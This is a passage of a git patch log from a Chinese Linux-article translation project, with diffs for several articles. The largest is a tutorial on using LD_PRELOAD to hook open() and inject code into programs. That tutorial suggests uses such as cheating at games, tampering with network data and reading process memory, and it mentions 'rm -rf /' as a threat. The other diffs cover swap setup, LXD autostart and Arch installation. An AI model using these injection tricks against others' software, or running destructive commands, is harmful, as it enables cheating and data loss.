是我们后面用到的 `dlsym` 函数所需要的。那个奇怪的 `#define` 是命令编译器去允许一些非标准的东西,我们需要它来启用 `dlfcn.h` 中的 `RTLD_NEXT`。那个 `typedef` 只是创建了一个函数指针类型的别名,它的参数等同于原始的 `open` —— 它现在的别名是 `orig_open_f_type`,我们将在后面用到它。 -我们定制的 open(…) 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 open(…) 函数。为了得到那个函数的地址,我们请求 _dlsym_ 去为我们查找,接下来的 “open” 函数在动态库栈上。最后,我们调用了那个函数(传递了与我们的假冒 ”open" 一样的参数),并且返回它的返回值。 +我们定制的 `open(...)` 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 `open(...)` 函数。为了得到那个函数的地址,我们请求 `dlsym` 在动态库堆栈上为我们查找下一个 `open()` 函数。最后,我们调用了那个函数(传递了与我们的假冒 `open()` 一样的参数),并且返回它的返回值。 我使用下面的内容作为我的 “邪恶的注入代码”: -inspect_open.c (fragment): +*inspect_open.c (片段):* ``` printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h! ``` -去完成它,我需要稍微调整一下编译参数: +要编译它,我需要稍微调整一下编译参数: -> ``` -> gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl -> ``` +``` +gcc -shared -fPIC  inspect_open.c -o inspect_open.so -ldl +``` -我增加了 _-ldl_ ,因此,它将共享库连接 _libdl_ ,它提供了 _dlsym_ 函数。(不,我还没有创建一个假冒版的 _dlsym_ ,不过这样更有趣) +我增加了 `-ldl`,因此,它将这个共享库链接到 `libdl` —— 它提供了 `dlsym` 函数。(不,我还没有创建一个假冒版的 `dlsym` ,虽然这样更有趣) -因此,结果是什么呢?一个共享库,它实现了 open(…) 函数,除了它 _输出_ 文件路径以外,其它的表现和真正的 open(…) 函数 **一模一样**。:-) +因此,结果是什么呢?一个实现了 `open(...)` 函数的共享库,除了它有 _输出_ 文件路径的意外作用以外,其它的表现和真正的 `open(...)` 函数 **一模一样**。:-) 如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了: -> ``` -> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator -> ``` +``` +LD_PRELOAD=$PWD/inspect_open.so gnome-calculator +``` -我鼓励你去看自己实验的结果,但是基本上,它实时列出了这个应用程序可以访问到的每个文件。 +我鼓励你去看看自己实验的结果,但是简单来说,它实时列出了这个应用程序可以访问到的每个文件。 -我相信它并不难去想像,为什么这可以用于去调试或者研究未知的应用程序。请注意,那只是部分的诀窍,并不是全部,因此 _open()_ 不仅是一个打开文件的函数 … 例如,在标准库中也有一个 _open64()_ ,并且为了完整地研究,你也需要为它去创建一个假冒的。 +我相信它并不难想像为什么这可以用于去调试或者研究未知的应用程序。请注意,这个特定诀窍并不完整,因为 `open()` 并不是唯一一个打开文件的函数 …… 例如,在标准库中也有一个 `open64()`,并且为了完整地研究,你也需要为它去创建一个假冒的。 -#### **可能的用法** +### 可能的用法 如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情! -1. ~~获得 root 权限~~ 你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。) +1. ~~获得 root 权限~~。你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。) +2. 欺骗游戏:**取消随机化**。这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从 `/dev/urandom` 之类的读取,你可以通过使用一个修改过的文件路径来运行原始的 `open()` 来把它们重定向到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来很容易上手。 +3. 欺骗游戏:**让子弹飞一会** 。实现所有的与时间有关的标准函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量和与时间相关的 `sleep` 或其它函数正确地计算了新的值,那么受影响的应用程序将认为时间变慢了(你想的话,也可以变快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用和禁用慢进或快进任何时间。 +4. 研究应用程序:**列出访问的文件**。它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。 +5. 研究应用程序:**监视因特网访问**。你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地控制基于 web 的应用程序发送了什么,不仅是看看,而是也能影响到交换的数据。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析和逆向工程使用闭源协议的应用程序。 +6. 研究应用程序:**检查 GTK 结构** 。为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们就可以知道一个应用程序使用了哪些组件,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习一些应用程序是怎么管理其界面的,这个方法超级有用! +7. **在沙盒中运行不安全的应用程序**。如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /` 或者一些其它不希望的文件活动,你可以通过修改传递到文件相关的函数(不仅是 `open` ,也包括删除目录等)的参数,来重定向所有的文件 I/O 操作到诸如 `/tmp` 这样地方。还有更难的诀窍,如 chroot,但是它也给你提供更多的控制。它可以更安全地完全 “封装”,但除非你真的知道你在做什么,不要以这种方式真的运行任何恶意软件。 +8. **实现特性** 。[zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问文件时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。 +9. **修复 bug**。另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype(它是闭源的软件)从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,这就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。 +10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作,而 `LD_PRELOAD` 则不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问所有的应用程序内存,从本质上看,是因为它是通过应用程序自身得以运行的。你可以修改这个应用程序能修改的任何东西。你可以想像一下,它允许你做许多的底层的侵入…… ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。 -2. 欺骗游戏:**取消随机化** 这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从`/dev/urandom` 中读取,或者,因此你可以通过使用一个修改的文件路径去运行原始的 `open()` 重定向它们到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来并不容易上手。 - -3. 欺骗游戏:**子弹时间** 实现所有的与标准时间有关的函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量正确地计算了新值,与时间相关的 `sleep` 函数、和其它的、受影响的应用程序将相信这个时间,(根据你的愿望)运行的更慢(或者更快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,让你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用&禁用慢进或者快进任何时间。 - -4. 研究应用程序:**列出访问的文件** 它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。 - -5. 研究应用程序:**监视因特网访问** 你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地获得控制应用程序基于 web 发送了什么,而不仅是看看,但是也会影响到数据的交换。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析&& 逆向工程使用闭源协议的应用程序。 - -6. 研究应用程序:**检查 GTK 结构** 为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们可以学习到一个应用程序使用的那些我们并不知道的玩意儿,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习怎么去做一些应用程序的接口管理,这个方法超级有用! - -7. **在沙盒中运行不安全的应用程序** 如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /`或者一些其它的不希望的文件激活,你可以通过修改它传递到所有文件相关的函数(不仅是 _open_ ,它也可以删除目录),去重定向它所有的文件 I/O 到诸如 `/tmp` 这里。还有更难的如 chroot 的诀窍,但是它也给你提供更多的控制。它会和完全 “封装” 一样安全,并且除了你真正知道做了什么以外,这种方法不会真实的运行任何恶意软件。 - -8. **实现特性** [zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。 - -9. **修复 bugs** 另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype – 它是闭源的软件 – 从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。 - -10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作。LD_PRELOAD 不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问任何应用程序的内存,从本质上看,是因为它是通过应用程序自身来得以运行的。你可以在应用程序可以达到的范围之内通过修改它做任何的事情。你可以想像一下,它允许你做许多的低级别的侵入 … ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。 - -这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 – 通过下面的评论区共享出来吧! +这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 —— 通过下面的评论区共享出来吧! -------------------------------------------------------------------------------- @@ -202,7 +196,7 @@ via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-l 作者:[Rafał Cieślak][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From bfe647d8d18d978671cc53522a01ffae0f0bf81e Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 24 Dec 2017 21:43:44 +0800 Subject: [PATCH 0769/1627] PUB:20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md @qhwdw https://linux.cn/article-9169-1.html --- ...D_PRELOAD to cheat inject features and investigate programs.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md (100%) diff --git a/translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md b/published/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md similarity index 100% rename from translated/tech/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md rename to published/20130402 Dynamic linker tricks Using LD_PRELOAD to cheat inject features and investigate programs.md From 770d607314237743e536e2cca47bd02e82cbc933 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 24 Dec 2017 22:30:17 +0800 Subject: [PATCH 0770/1627] =?UTF-8?q?translate=20'20170802=20Creating=20SW?= =?UTF-8?q?AP=20partition=20using=20FDISK=20-=20FALLOCATE=20commands.md'?= =?UTF-8?q?=20done=20at=202017=E5=B9=B4=2012=E6=9C=88=2024=E6=97=A5=20?= =?UTF-8?q?=E6=98=9F=E6=9C=9F=E6=97=A5=2022:30:17=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tition using FDISK - FALLOCATE commands.md | 118 ------------------ ...tition using FDISK - FALLOCATE commands.md | 117 +++++++++++++++++ 2 files changed, 117 insertions(+), 118 deletions(-) delete mode 100644 sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md create mode 100644 translated/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md diff --git a/sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md b/sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md deleted file mode 100644 index 0a8bfb8fa0..0000000000 --- a/sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md +++ /dev/null @@ -1,118 +0,0 @@ -translating by lujun9972 -Creating SWAP partition using FDISK & FALLOCATE commands -====== -Swap-partition holds the memory which is used in case the physical memory (RAM) is full . When RAM capacity has been utilized to maximum , Linux machine moves inactive pages from memory to swap-space which are then used by the system. Though it gets the work done, it should not be considered as a replacement to physical memory/RAM. - -In most cases, it is advised to keep SWAP-memory equal to size of physical memory at minimum & double the size of physical memory at maximum. So if you have 8 GB RAM on your system, Swap should be between 8-16 GB. - -If a swap-partition has not been configured in your Linux system, your system might start killing off the running process/applications & might cause your system to crash. In this tutorial, we will learn to add swap-partition to Linux system & we will be discussing two methods for creating a swap-partition - - * **Using fdisk command** - * **Using fallocate command** - - - -### First Method (Using Fdisk command) - -Normally, first hdd of the system is named **/dev/sda** & partitions for it are named **/dev/sda1** , **/dev/sda2**. For this tutorial we will using a HDD that have 2 primary partitions on system i.e. /dev/sda1, /dev/sda2 & SWAP will be /dev/sda3. - -Firstly we will create a partition, - -``` -$ fdisk /dev/sda -``` - -to create a new partition type **' n'** . You will now be asked to enter the first cylinder value, just hit enter key to use default value & then you will asked to enter last cylinder value, here we will enter the size of swap partition (we will be using 1000MB). Enter the value in last cylinder as +1000M. - -![swap][2] - -We have now created a partition of size 1000MB but we have not assigned it any partition type, so to assign a partition type, press **" t"** & press enter. - -Now you will be first asked to enter partition number, which is **3** for our partition & then we will asked to enter partition id which for swap it's **82** (to see list of all available partition types, press **" l"** ) & then press " **w "** to save the partition table. - -![swap][4] - -Next we will format our swap partition using mkswap command - -``` -$ mkswap /dev/sda3 -``` - -& will then activate our newly created swap - -``` -$ swapon /dev/sda3 -``` - -But our swap will not be mounted automatically after every reboot. To mount it permanently in our system, we need to append /etc/fstab file. Open /etc/fstab file & make an entry of the following line - -``` -$ vi /etc/fstab -``` - -``` -/dev/sda3 swap swap default 0 0 -``` - -Save & close the file. Our swap now will even work after a reboot. - -### Second Method (using fallocate command) - -I prefer this method as this is easiest & fastest way to create swap. Fallocate is one of the most underestimated & very less used command. Fallocate is used to pre-allocate blocks/size to a files. - -To create a swap using fallocate, we will firstly create a file named **swap_space** in ** '/'**. Next we will allocate 2GB to our file swap_space , - -``` -$ fallocate -l 2G /swap_space -``` - -We will then verify the size of the file by running - -``` -ls-lh /swap_space. -``` - -Next, we will make our /swap_space more secure by changing the file permissions - -``` -$ chmod 600 /swap_space** -``` - -Now only root will be able to read, write on this file. We will now format the swap partition, - -``` -$ mkswap /swap_space -``` - -& then will turn on our swap - -``` -$ swapon -s -``` - -This swap partition will need to be remounted after every reboot. So to make it permanent, edit the /etc/fstab, as we did above & enter the following line - -``` -/swap_space swap swap sw 0 0 -``` - -Save & exit the file. Our swap will now be permanently mounted. We can check if your swap is working or not by running " **free -m** " on your terminal after rebooting the system. - -This completes our tutorial, I hope it was simple enough to understand & learn. If you are having any issues or have have any queries, please mention them in the comment box below. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/create-swap-using-fdisk-fallocate/ - -作者:[Shusain][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ -[1]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=668%2C211 -[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk.jpg?resize=668%2C211 -[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=620%2C157 -[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk-swap-select.jpg?resize=620%2C157 diff --git a/translated/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md b/translated/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md new file mode 100644 index 0000000000..455ade916c --- /dev/null +++ b/translated/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md @@ -0,0 +1,117 @@ +使用 FDISK 和 FALLOCATE 命令创建交换分区 +====== +交换分区在物理内存(RAM)被填满时用来保持内存中的内容. 当 RAM 被耗尽, Linux 会将内存中不活动的页移动到交换空间中,从而空出内存给系统使用. 虽然如此, 但交换空间不应被认为是可以用来替代物理内存/RAM的. + +大多数情况下, 建议交换内存的大小为物理内存的1到2倍. 也就是说如果你有8GB内存, 那么交换空间大小应该介于8-16 GB. + +若系统中没有配置交换分区, 当内存耗尽后,系统可能会杀掉正在运行中哦该的进程/应哟该从而导致系统崩溃. 在本文中, 我们将学会如何为Linux系统添加交换分区,我们有两个办法: + ++ **使用 fdisk 命令** ++ **使用 fallocate 命令** + + + +### 第一个方法(使用 Fdisk 命令) + +通常, 系统的第一块硬盘会被命名为 **/dev/sda** 而其中的分区会命名为 **/dev/sda1** , **/dev/sda2**. 本文我们使用的石块有两个主分区的硬盘,两个分区分别为 /dev/sda1, /dev/sda2,而我们使用 /dev/sda3 来做交换分区. + +首先创建一个新分区, + +``` +$ fdisk /dev/sda +``` + +按 **' n'** 来创建新分区. 系统会询问你从哪个柱面开始, 直接按回车键使用默认值即可。然后系统询问你到哪个柱面结束, 这里我们输入交换分区的大小(比如1000MB). 这里我们输入 +1000M. + +![swap][2] + +现在我们创建了一个大小为 1000MB 的磁盘了。但是我们并没有设个分区的类型, 我们按下 **" t"** 然后回车来设置分区类型. + +现在我们要输入分区编号, 这里我们输入 **3**,然后输入磁盘分类id,交换分区的磁盘类型为 **82** (要显示所有可用的磁盘类型, 按下 **" l"** ) 然后再按下 " **w "** 保存磁盘分区表. + +![swap][4] + +再下一步使用 `mkswap` 命令来格式化交换分区 + +``` +$ mkswap /dev/sda3 +``` + +然后激活新建的交换分区 + +``` +$ swapon /dev/sda3 +``` + +然而我们的交换分区在重启后并不会自动挂载. 要做到永久挂载,我们需要添加内容道 `/etc/fstab` 文件中. 打开 `/etc/fstab` 文件并输入下面行 + +``` +$ vi /etc/fstab +``` + +``` +/dev/sda3 swap swap default 0 0 +``` + +保存并关闭文件. 现在每次重启后都能使用我们的交换分区了. + +### 第二种方法(使用 fallocate 命令) + +我推荐用这种方法因为这个是最简单,最快速的创建交换空间的方法了. Fallocate 是最被低估和使用最少的命令之一了. Fallocate 用于为文件预分配块/大小. + +使用 fallocate 创建交换空间, 我们首先在 ** '/'** 目录下创建一个名为 **swap_space** 的文件. 然后分配2GB道 swap_space 文件, + +``` +$ fallocate -l 2G /swap_space +``` + +我们运行下面命令来验证文件大小 + +``` +ls-lh /swap_space. +``` + +然后更改文件权限,让 `/swap_space` 更安全 + +``` +$ chmod 600 /swap_space** +``` + +这样只有 root 可以读写该文件了. 我们再来格式化交换分区(译者注:虽然这个swap_space应该是文件,但是我们把它当成是分区来挂载), + +``` +$ mkswap /swap_space +``` + +然后启用交换空间 + +``` +$ swapon -s +``` + +每次重启后都要重现挂载磁盘分区. 因此为了使之持久话,就像上面一样,我们编辑 `/etc/fstab` 并输入下面行 + +``` +/swap_space swap swap sw 0 0 +``` + +保存并退出文件. 现在我们的交换分区会一直被挂载了. 我们重启后可以在终端运行 **free -m** 来检查交换分区是否生效. + +我们的教程至此就结束了, 希望本文足够容易理解和学习. 如果有任何疑问欢迎提出. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/create-swap-using-fdisk-fallocate/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=668%2C211 +[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk.jpg?resize=668%2C211 +[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=620%2C157 +[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk-swap-select.jpg?resize=620%2C157 From 851496e2a24b155b08615a884359913d22bcf661 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 25 Dec 2017 08:56:10 +0800 Subject: [PATCH 0771/1627] translated --- ...rt LXD containers at boot time in Linux.md | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) rename {sources => translated}/tech/20170219 How to auto start LXD containers at boot time in Linux.md (53%) diff --git a/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md b/translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md similarity index 53% rename from sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md rename to translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md index 0958e8c691..b6e5df86c4 100644 --- a/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md +++ b/translated/tech/20170219 How to auto start LXD containers at boot time in Linux.md @@ -1,14 +1,13 @@ -translating---geekpi - -How to auto start LXD containers at boot time in Linux +如何在 Linux 启动时自动启动 LXD 容器 ====== -I am using LXD ("Linux container") based VM. How do I set an LXD container to start on boot in Linux operating system? +我正在使用基于 LXD(“Linux 容器”)的虚拟机。如何在 Linux 系统中启动时自动启动 LXD 容器? -You can always start the container when LXD starts on boot. You need to set boot.autostart to true. You can define the order to start the containers in (starting with highest first) using boot.autostart.priority (default value is 0) option. You can also define the number of seconds to wait after the container started before starting the next one using boot.autostart.delay (default value 0) option. +你可以在 LXD 启动后启动容器。你需要将 boot.autostart 设置为 true。你可以使用 boot.autostart.priority(默认值为 0)选项来定义启动容器的顺序(从最高开始)。你也可以使用 boot.autostart.delay(默认值0)选项定义在启动一个容器后等待几秒后启动另一个容器。 -### Syntax +### 语法 + +上面讨论的关键字可以使用 lxc 工具用下面的语法来设置: -Above discussed keys can be set using the lxc tool with the following syntax: ``` $ lxc config set {vm-name} {key} {value} $ lxc config set {vm-name} boot.autostart {true|false} @@ -16,30 +15,30 @@ $ lxc config set {vm-name} boot.autostart.priority integer $ lxc config set {vm-name} boot.autostart.delay integer ``` -### How do I set an LXD container to start on boot in Ubuntu Linux 16.10? +### 如何在 Ubuntu Linux 16.10 中让 LXD 容器在启动时启动? -Type the following command: +输入以下命令: `$ lxc config set {vm-name} boot.autostart true` -Set an LXD container name 'nginx-vm' to start on boot +设置一个 LXD 容器名称 “nginx-vm” 以在启动时启动 `$ lxc config set nginx-vm boot.autostart true` -You can verify setting using the following syntax: +你可以使用以下语法验证设置: ``` $ lxc config get {vm-name} boot.autostart $ lxc config get nginx-vm boot.autostart ``` -Sample outputs: +示例输出: ``` true ``` -You can the 10 seconds to wait after the container started before starting the next one using the following syntax: +你可以使用下面的语法在启动容器后等待 10 秒钟后启动另一个容器: `$ lxc config set nginx-vm boot.autostart.delay 10` -Finally, define the order to start the containers in by setting with highest value. Make sure db_vm container start first and next start nginx_vm +最后,通过设置最高值来定义启动容器的顺序。确保 db_vm 容器首先启动,然后再启动 nginx_vm。 ``` $ lxc config set db_vm boot.autostart.priority 100 $ lxc config set nginx_vm boot.autostart.priority 99 ``` -Use [the following bash for loop on Linux to view all][1] values: +使用[下面的 bash 循环在 Linux 上查看所有][1]值: ``` #!/bin/bash echo 'The current values of each vm boot parameters:' @@ -55,7 +54,7 @@ done ``` -Sample outputs: +示例输出: ![Fig.01: Get autostarting LXD containers values using a bash shell script][2] @@ -64,7 +63,7 @@ Sample outputs: via: https://www.cyberciti.biz/faq/how-to-auto-start-lxd-containers-at-boot-time-in-linux/ 作者:[Vivek Gite][a] -译者:[译者ID](https://github.com/译者ID) +译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From f7068e1858f0cf56f7de273e1a1a8ec5c77194b3 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 25 Dec 2017 08:58:26 +0800 Subject: [PATCH 0772/1627] translating --- .../tech/20171215 5 of the Best Bitcoin Clients for Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md b/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md index c5a646fe40..e645620e76 100644 --- a/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md +++ b/sources/tech/20171215 5 of the Best Bitcoin Clients for Linux.md @@ -1,3 +1,5 @@ +translating-----geekpi + 5 of the Best Bitcoin Clients for Linux ====== By now you have probably heard of [Bitcoin][1] or the [Blockchain][2]. The price of Bitcoin has skyrocketed several times in the past months, and the trend continues almost daily. The demand for Bitcoin seems to grow astronomically by the minute. From d547c650ac65860f677f6797c4c8223ff334855e Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 25 Dec 2017 10:24:39 +0800 Subject: [PATCH 0773/1627] PRF:20171211 How to Install Arch Linux [Step by Step Guide].md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @wenwensnow 请对比我的校对,一些细节可以做到更好~加油师妹! --- ...Install Arch Linux [Step by Step Guide].md | 623 +++++++++--------- 1 file changed, 297 insertions(+), 326 deletions(-) diff --git a/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md b/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md index 0222458309..cc1bae9c98 100644 --- a/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md +++ b/translated/tech/20171211 How to Install Arch Linux [Step by Step Guide].md @@ -1,329 +1,300 @@ -如何安装 Arch Linux [详细安装步骤指导] +一步步教你如何安装 Arch Linux ====== -**简要说明:这一教程会教你如何用简单步骤安装Arch Linux.** -[Arch Linux][1] 是一个在喜欢自己定制Linux系统的用户和Linux爱好者中很受欢迎的x86-64多用途发行版。默认的安装文件只含有一个最基本的系统,它希望使用者自己配置并使用Arch系统。根据KISS - 使它保持简单这一原则 (愚蠢!),Arch Linux 是一个优雅,注重源代码正确性,体积尽可能小,简洁的操作系统。 - - Arch 支持滚动升级并且有自己的软件包管理器 - [pacman][3]。为了始终让自己处在操作系统的前沿,Arch从不错过任何一个最新的源。实际上,默认安装只含有一个基本的操作系统,使得你在低端硬件上也能安装Arch,并且安装过程中只会安装系统正常运行所必须的包。 - - - 同时,它也是从头开始学习Linux的一个很好的操作系统。如果你想自己动手安装Linux,你不妨尝试一下Arch Linux. 这是许多Linux 用户觉得很有益处的一次体验。 - - - 在这篇文章里,我们会了解到如何安装,配置Arch并安装桌面环境。 - - - ## 如何安装Arch Linux - - - ![How to install Arch Linux][4] - - ![How to install Arch Linux][5] - - 我们在这里讨论的安装方法是从你的电脑上"完全删除已有的操作系统" ,而后安装Arch Linux. 如果你想根据这一教程安装Arch,确保你已经备份了所有文件。否则你就会失去全部数据,这里已经提醒过你了。 - - - 在你从USB上安装Arch 之前,确保你已经满足了以下条件: - - ### 安装Arch Linux 的条件: - - - * 一个兼容x86_64(例如 64位)的机器 - * 最小 512M 内存(建议 2GB) - * 最少 1G 的磁盘空余空间 (日常使用推荐 20GB) - * 可以访问网络 - * A USB drive with minimum 2 GB of storage capacity 至少有2G存储空间的U盘 - * Familiarity with Linux command line 熟悉Linux 命令行 - - - 一旦你确认满足所有条件,就可以开始安装Arch Linux了。 - - - ### 第一步:下载ISO 文件 - - 你可以从官网上下载ISO。安装Arch Linux 需要一个至少有512M内存和800M磁盘空间,并兼容x86_64的机器。不过,建议至少有2G内存和20G磁盘空间,这样安装桌面环境时就不会遇到麻烦。 - - - ### 第二步:创建一个Arch Linux 的 live USB - - 我们需要用你刚刚下载的ISO文件创建一个Arch Linux 的live USB。 - - 如果你使用Linux,你可以用 **dd** 命令来创建live USB。 记得参考下面的例子将 /path/to/archlinux.iso 改成你ISO文件的实际存储位置,/dev/sdx 改成你的磁盘设备号 (i.e /dev/sdb)。你可以通过 [lsblk][7] 命令来了解你的设备信息。 - - - ``` - dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync - ``` - 在Windows下,有多种方法来创建live USB。 推荐工具是 Rufus。我们之前已经有如何使用这一工具创建Antergos live USB的教程。因为Antergos发行版是基于Arch的,你可以使用同一教程。 - - ### 步骤三:从 live USB 上启动 - - 一旦你已经创建了Arch Linux 的live USB,关闭你的电脑。插上你的U盘然后启动系统。在开机启动时,持续按F2,F10或F1(根据你的电脑型号)进入启动设置。在这里,选择从U盘或可移除设备启动 这一项。 - - 一旦你选择了它,你会看到这样一个选项: - - ![Arch Linux][4] - - ![Arch Linux][9] - - 选择启动 Arch Linux (x86_64)。检查后,Arch Linux 会启动root用户的命令行界面。 - Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user. - - 接下来的步骤会包括磁盘分区,创建文件系统并挂载它。 - - ### 第四步:磁盘分区 - - 